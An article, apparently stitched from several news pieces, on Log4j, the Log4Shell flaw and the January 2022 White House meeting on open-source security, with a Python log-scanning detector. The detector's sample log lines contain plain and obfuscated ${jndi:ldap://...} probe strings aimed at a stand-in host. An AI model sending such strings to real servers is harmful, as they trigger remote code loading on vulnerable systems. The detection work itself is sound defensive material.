Google and IBM
What is Log4j?
Log4j is an open source logging framework for Java applications. It provides a flexible, configurable way to write log messages in different formats, such as plain text, XML, and JSON, to various destinations, such as the console, files, and remote servers. Log4j is used in a great many Java-based systems, including enterprise back ends, web applications, and command-line tools, and it is often pulled into an application indirectly, as a dependency of some other library or framework.
Log4j lets developers log messages at different levels of severity: TRACE, DEBUG, INFO, WARN, ERROR, and FATAL. Each level indicates how serious the logged event is. For example, DEBUG is for detailed information used in troubleshooting, ERROR marks a failure the application can recover from, and FATAL marks an error severe enough that the application will probably have to abort.
Log4j also provides filtering and formatting. Developers can configure it to filter messages by level, by logger name (which normally reflects the originating class), or by content, and to format them either with a pattern string (the PatternLayout) or with a structured layout such as JSON.
Log4j became an Apache project in 2001 and is maintained by the Apache Logging Services Project. It is a de facto standard for logging in Java. The Log4Shell vulnerability (CVE-2021-44228), disclosed in December 2021, affected Log4j 2 versions 2.0-beta9 through 2.14.1: if an attacker could get a lookup string of the form ${jndi:ldap://...} into a message that was logged, the library would resolve it through JNDI and could end up loading attacker-supplied code. The issue was fixed in 2.15.0 and hardened further in 2.16.0 and 2.17.0, which is why keeping Log4j up to date, and knowing which version is actually on the classpath, matters.
Log4j Open Source Logging Library
Log4j is an open-source logging library for Java. Many Java applications use it to write log messages in a variety of formats, including plain text, XML, and JSON. It is a useful case study for the list of critical open source projects that Google and IBM asked for, because the code most applications actually load is a small set of Log4j modules plus a few optional dependencies, and the vulnerable part is narrower than the name "Log4j" suggests.
The components that matter when assessing a Java application's exposure are:
- Apache Log4j API (log4j-api): the interfaces applications code against (Logger, LogManager). On its own it produces no output, and it was not affected by Log4Shell.
- Apache Log4j Core (log4j-core): the implementation that configures appenders, layouts, and filters and actually writes log output. It also contains the lookup machinery that expands ${...} expressions, including the JNDI lookup behind Log4Shell; this is the artifact that had to be upgraded (or have its JndiLookup class removed) to close the hole.
- Jackson (optional): log4j-core's JSON, XML, and YAML layouts rely on the Jackson libraries. They are only pulled in if a project declares them.
- SLF4J: a logging facade, not a Log4j dependency. Applications that code against SLF4J reach Log4j 2 through the log4j-slf4j-impl binding, so an SLF4J-based application can still be carrying a vulnerable log4j-core.
- Apache Commons Lang, Commons Collections, and Commons IO: often listed as Log4j dependencies, but they are not; log4j-core has no required third-party runtime dependency beyond log4j-api. A scan that flags them says nothing about Log4Shell exposure.
The point for the supply-chain discussion is that Log4j usually enters an application transitively, through a framework or another library, so the question is not whether a team chose Log4j but whether log4j-core is on the classpath and at which version. That is precisely what a software bill of materials is meant to answer, and it is why keeping these components up to date matters for the security and reliability of the Java applications that use them.
Google and IBM have requested a list of essential open source projects for Log4j
Google also recommended forming an organization to serve as a marketplace for open source maintenance after attending a meeting at the White House. Officials from Apache, Google, Apple, Amazon, IBM, Microsoft, Meta, the Linux Foundation, and Oracle attended, as did government institutions including the Department of Defense and the Cybersecurity and Infrastructure Security Agency (CISA); Anne Neuberger, the White House's deputy national security advisor for cyber and emerging technology, was among the speakers. The meeting took place as businesses work to address the Log4j vulnerability, which has been a source of concern since its disclosure in December.
Given the worldwide reliance on digital infrastructure, Kent Walker, Google and Alphabet's president of global affairs, believes it is time to think of it the way we think of physical infrastructure.
“Open source software is a connecting tissue for much of the internet world, and it needs the same attention and financing as our roads and bridges receive,” Walker added.
Walker noted in a blog post that during the discussion, Google proposed numerous options for how to proceed in the aftermath of the Log4j issue.
Walker believes that identifying a list of critical open source projects will require public-private cooperation, and that criticality should be assessed on the basis of a project's influence and importance. Such a list would help organisations prioritise and allocate resources to the most critical security reviews and improvements.
IBM’s enterprise security head Jamie Thomas echoed Walker’s remarks, saying the White House meeting “made clear that government and industry can work together to promote open source security standards.”
“We can start by encouraging widespread adoption of open and sensible security standards, identifying critical open source assets that must meet the most stringent security requirements, promoting a collaborative national effort to expand skills training and education in open source security, and rewarding developers who make significant contributions to the field,” Thomas said.
Walker lauded the efforts of groups like the OpenSSF, which has received a $100 million investment from Google and is already working on developing standards.
He also said that Google recommended forming an entity to act as a marketplace for open source maintenance, matching volunteers from companies with the most critical projects in need of help. He said Google was “prepared to provide resources” to the effort.
According to Joe Brockmeier, vice president of marketing at the Apache Software Foundation, there is no single “silver bullet” for resolving the security challenges that plague the open source supply chain. “The route forward will necessitate upstream collaboration by corporations and organizations that consume and ship open source software,” he continued.
Many of the measures proposed by Google and IBM were backed by Akamai, which also had representatives at the White House meeting. Governments and the technology community must develop reliable containment plans for when exploits are discovered, improve cross-government and industry information sharing when vulnerabilities are first discovered, and expand government authorization of solutions to increase defences, according to Akamai.
An important takeaway from the discussion, according to Boaz Gelbord, Akamai's chief security officer, was the shared recognition that more needs to be done to help the open source community flourish in an ever-changing threat landscape.
“Akamai sees a unique need for improved information sharing, strong vulnerability management, and putting out containment measures to minimise the blast radius of assaults,” Gelbord added. “We’re excited to broaden our efforts in the open source community and contribute to the critical next steps that will emerge from this White House discussion.”
The White House is concerned about the next major open source vulnerability after Log4j
Today, the White House will host a meeting with IT leaders to examine Log4j and other potential security flaws.
The White House is hosting a meeting today, January 13, 2022, with Apache, Google, Apple, Amazon, and other major technology companies to discuss software security and open source. It comes in the wake of the Log4j vulnerability, which has caused worldwide alarm since its disclosure in December.
White House National Security Advisor Jake Sullivan requested the meeting in a letter to the companies in December, saying it was a “national security problem” for basic open source software to be maintained by volunteers.
Officials from IBM, Microsoft, Meta, the Linux Foundation, and Oracle, as well as government agencies such as the Department of Defense and the Cybersecurity and Infrastructure Security Agency (CISA), are expected to attend the meeting, which is being organised by Anne Neuberger, the White House's deputy national security advisor for cyber and emerging technology.
The incident surrounding Log4j, according to Chris Inglis, National Cyber Director, “has underlined the need to improve our software security and the transparency of our software supply chain.”
The Apache Software Foundation, which maintains Log4j and is run by volunteers, released a flurry of documents describing its position and its efforts to resolve the vulnerability ahead of the meeting. Some of the documents offer an implicit defence of the foundation's crisis response, describing Log4Shell as the result of “an awful combination of separately created features within the Java platform,” among other things.
Apache manages 227 million lines of code and hundreds of open source projects, according to the foundation.
CISA director Jen Easterly and Eric Goldstein, CISA's executive assistant director for cybersecurity, told reporters at a press briefing earlier this week that they had not seen any “high-profile breaches or attacks” related to the Log4j vulnerability, aside from the attack on the Belgian Defense Ministry.
“This could be because sophisticated attackers have already exploited this vulnerability to target targets and are merely waiting for network defenders to become less vigilant before exploiting their newfound access. Everyone knows the Equifax data leak in September 2017, which was caused by an open-source software flaw found in March of that year,” Easterly remarked.
CISA is accelerating its work on the “software bill of materials” (SBOM) as a result of Log4j, according to Easterly, who added that the agency recently hired Allan Friedman, who previously led cybersecurity and SBOM work at the Commerce Department. Friedman now leads SBOM efforts both inside and outside the US government. Easterly and Goldstein both pointed to today's White House meeting as part of the effort to address open source security concerns.
“We are prioritising support and openness for developers and maintainers of those specific frameworks and components. We are prioritising this strategy because of the ubiquity of these components and their ubiquitous application across technology contexts. This weakness will spur more attention, focus, and investment, resulting in improved security,” Goldstein said.
Despite the lack of large-scale attacks, Goldstein said, attackers have been scanning for and exploiting Log4Shell to install cryptomining software on compromised machines or to conscript victim systems into botnets.
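The scanning Goldstein describes shows up in web server and application logs as lookup strings placed in request fields that get logged, such as the User-Agent. The script below is an added example, not code from the original article or from CISA or Apache: it approximates how Log4j's StrSubstitutor resolves nested ${...} lookups (innermost first, with lower:/upper: transforms and :- defaults) so that obfuscated probes are decoded before matching, and then reports every line that contains a JNDI lookup. The access-log lines are constructed for this example, using documentation IP ranges, and the treatment of lookups other than lower, upper, jndi and defaults is a simplification (they are left unresolved).

```python
import re

# Constructed access-log lines for this example (not real traffic; the
# addresses come from the documentation ranges 198.51.100.0/24 and
# 203.0.113.0/24). The last field is the User-Agent, a common place for
# Log4Shell probes because many applications log it.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [12/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.10 - - [12/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:J}ndi:${lower:L}${lower:D}a${lower:P}://203.0.113.10:1389/a}"',
    '203.0.113.10 - - [12/Dec/2021:03:14:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10:1389/a}"',
    '203.0.113.10 - - [12/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}ldap://203.0.113.10:1389/a}"',
    '198.51.100.8 - - [12/Dec/2021:03:14:17 +0000] "GET /app HTTP/1.1" 200 128 "-" "report-bot/1.0 ${ctx:user}"',
]

# An innermost lookup: "${" ... "}" with no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup in normalised text; Log4j matches the lookup name case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi:[^}]*\}?", re.IGNORECASE)


def _resolve(match):
    """Resolve one innermost lookup the way an attacker relies on Log4j doing it.

    Only the behaviours used for obfuscation are modelled: "lower:" and
    "upper:" transform their argument, and any lookup carrying a ":-default"
    yields the default (the real lookup, e.g. env:NaN, fails and falls back).
    A "jndi:" lookup is left in place so it stays visible to the detector, and
    any other lookup without a default is left unresolved (a simplification).
    """
    body = match.group(1)
    kind, _, arg = body.partition(":")
    kind = kind.lower()
    if kind == "jndi":
        return match.group(0)
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(text, max_rounds=32):
    """Resolve innermost lookups repeatedly, as Log4j's StrSubstitutor does,
    until nothing changes. max_rounds bounds the work a hostile line can cause."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_probes(lines):
    """Return one record per line that contains a JNDI lookup after normalisation."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        found = _JNDI.search(normalize(raw))
        if found:
            hits.append({"line": number, "decoded": found.group(0), "raw": raw})
    return hits


if __name__ == "__main__":
    for hit in find_jndi_probes(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['decoded']}")
```

Matching the raw text for ${jndi: alone catches only the second sample line; the other three decode to the same lookup only after normalisation, which is why that step comes first. A detector like this tells you who is probing, not whether the log4j-core on a given host is a vulnerable version, so it complements inventory and upgrading rather than replacing them.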
There have already been three generations of the Log4j vulnerability, according to Steve Povolny, head of advanced threat research at McAfee Enterprise, raising concerns about broader problems in similar systems. While he does not expect further iterations of the Log4j flaw itself, he pointed to recent research on JNDI issues as an example of how widespread attention to Log4j has led to the identification of other flaws.
“What you’re seeing here is a 20-year pattern I refer to as ambulance chasing, and it’s a really successful method for identifying comparable flaws.” It happens a lot when there are a lot of critical weaknesses, where someone exposes exploit code and the research sector finds a new subject of interest because it’s glamorous and timely,” he explained. “However, it proves to be an excellent strategy for flushing out similar types of vulnerabilities in projects and products that are either identical or distantly related.”